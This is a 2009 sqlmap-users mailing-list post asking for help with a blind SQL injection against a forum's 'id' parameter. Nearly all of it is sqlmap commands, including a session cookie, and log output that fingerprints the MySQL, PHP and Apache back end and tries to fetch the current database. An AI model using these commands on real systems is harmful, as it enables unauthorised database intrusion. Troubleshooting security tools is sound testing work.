[sqlmap-users] Blind injection possible - no output
From: Erik N. <da...@gm...> - 2009-09-08 12:48:12
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --fingerprint
[14:09:04] [INFO] GET parameter 'id' is unescaped numeric injectable
with 0 parenthesis
[14:09:04] [INFO] testing for parenthesis on injectable parameter
[14:09:06] [INFO] the injectable parameter requires 0 parenthesis
[14:09:06] [INFO] testing MySQL
[14:09:07] [INFO] confirming MySQL
[14:09:08] [INFO] retrieved:
[14:09:10] [INFO] the back-end DBMS is MySQL
[14:09:10] [INFO] retrieved:
[14:11:28] [INFO] retrieved:
[14:11:32] [INFO] retrieved:
[14:11:35] [INFO] retrieved:
[14:11:41] [INFO] retrieved:
[14:11:46] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: active fingerprint: MySQL < 3.22.11
comment injection fingerprint: MySQL 5.0.75
[*] shutting down at: 14:12:50
sqlmap --cookie="__utma=107765125.1866601438.1252398961.1252398961.1252406202.2;
__utmz=107765125.1252398961.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmb=107765125.29.10.1252406202; __utmc=107765125;
PHPSESSID=ac0cb4d93b808fc5dc98c13043b6fbf9"
--url="http://192.168.1.3/forum/index/forum?id=8" --method=GET -p id
--string="Secret Forum" --current-db
[14:14:01] [INFO] GET parameter 'id' is unescaped numeric injectable with 0 parenthesis
[14:14:01] [INFO] testing for parenthesis on injectable parameter
[14:14:03] [INFO] the injectable parameter requires 0 parenthesis
[14:14:03] [INFO] testing MySQL
[14:14:04] [INFO] confirming MySQL
[14:14:05] [INFO] retrieved:
[14:14:07] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.2.6, Apache
back-end DBMS: MySQL < 5.0.0
[14:14:07] [INFO] fetching current database
[14:14:07] [INFO] retrieved:
current database: None
What to do?